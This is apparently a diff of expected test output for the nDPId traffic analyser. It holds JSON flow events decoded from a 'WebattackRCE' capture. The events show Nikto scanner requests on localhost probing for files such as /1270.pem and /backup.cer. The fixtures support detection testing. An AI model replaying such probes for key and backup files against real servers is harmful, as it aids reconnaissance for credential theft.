-01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":1,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277034,"pkt":"AAAAAAAAAAAAAAAACABFAADCi6hAAEAGsIt\/AAABfwAAAcNeH5CrCbPNtCCkdYAYAED+tgAAAQEICp1m\/FKdZvxSR0VUIC9iYWNrdXAuY2VyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":235,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277034,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":236,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277036,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
